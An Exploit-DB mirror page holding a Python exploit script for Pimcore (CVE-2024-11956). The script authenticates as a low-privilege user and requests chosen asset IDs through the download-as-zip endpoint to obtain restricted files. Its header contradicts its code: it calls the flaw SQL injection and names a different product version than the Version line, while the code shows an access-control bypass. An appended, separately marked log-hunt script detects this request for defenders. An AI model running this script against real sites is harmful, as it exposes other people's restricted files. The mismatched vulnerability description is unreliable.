exploit-db-mirror/exploits/multiple/webapps/52193.py
Exploit-DB 0f3d104e83 DB: 2025-04-15
15 changes to exploits/shellcodes/ghdb

ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass
GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)
GestioIP 3.5.7 - Cross-Site Scripting (XSS)
GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
GestioIP 3.5.7 - Remote Command Execution (RCE)
GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)
OpenPanel 0.3.4 - Directory Traversal
OpenPanel 0.3.4 - Incorrect Access Control
OpenPanel 0.3.4 - OS Command Injection
OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
Pimcore 11.4.2 - Stored cross site scripting
Pimcore customer-data-framework 4.2.0 - SQL injection
SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)
Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
2025-04-15 00:16:26 +00:00

42 lines | No EOL | 1.4 KiB | Python | Executable file

# Exploit Title: Pimcore customer-data-framework 4.2.0 - SQL injection
# Date: 01/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore versions prior to 10.5.21
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
# CVE: CVE-2024-11956
import requests

# Replace with target URL and credentials
TARGET_URL = "http://example.com/pimcore"
USERNAME = "low_privilege_user"
PASSWORD = "password123"

# Authenticate and get session
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)
if "Login successful" in login_response.text:
    print("[+] Authenticated successfully.")
    # Exploit the downloadAsZip functionality
    download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
    payload = {
        "ids[]": ["1", "2", "3"]  # Replace with IDs of restricted files/folders
    }
    download_response = session.post(download_url, data=payload)
    if download_response.status_code == 200:
        print("[+] Exploit successful. Restricted files downloaded.")
        with open("restricted_files.zip", "wb") as f:
            f.write(download_response.content)
    else:
        print("[-] Exploit failed. Server returned:", download_response.status_code)
else:
    print("[-] Authentication failed.")
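
A log hunt for the request the script above issues, as an added example that is not part of the Exploit-DB file: it scans access-log lines for POSTs to the `download-as-zip` path and totals successful and denied responses per client. The Combined Log Format, the sample lines and the function name are assumptions; a hit is a triage lead only, since a standard access log does not record which asset IDs were requested.

```python
import re
from collections import defaultdict

# Path taken from the script above; everything else here is an assumption.
ZIP_PATH = "/admin/asset/download-as-zip"

# Combined Log Format: ip ident user [time] "METHOD path proto" status bytes ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [15/Apr/2025:10:01:02 +0000] "POST /pimcore/admin/login HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
203.0.113.7 - - [15/Apr/2025:10:01:03 +0000] "POST /pimcore/admin/asset/download-as-zip HTTP/1.1" 200 4718592 "-" "python-requests/2.31.0"
198.51.100.4 - - [15/Apr/2025:10:05:00 +0000] "GET /pimcore/ HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Apr/2025:10:06:00 +0000] "POST /pimcore/admin/asset/download-as-zip HTTP/1.1" 403 120 "-" "Mozilla/5.0"
not a log line
"""


def find_zip_downloads(log_text):
    """Return per-client stats for POSTs to the zip-download path."""
    hits = defaultdict(lambda: {"ok": 0, "denied": 0, "bytes": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than aborting the hunt
        path = m["path"].split("?", 1)[0]  # ignore any query string
        if m["method"] != "POST" or not path.endswith(ZIP_PATH):
            continue
        entry = hits[m["ip"]]
        if m["status"] == "200":
            entry["ok"] += 1
            entry["bytes"] += 0 if m["size"] == "-" else int(m["size"])
        elif m["status"] in ("401", "403"):
            entry["denied"] += 1
    return dict(hits)


if __name__ == "__main__":
    for ip, stats in find_zip_downloads(SAMPLE_LOG).items():
        print(ip, stats)
```

Clients with successful zip downloads can then be checked against the application's own audit data to confirm whether the account was entitled to the assets it received.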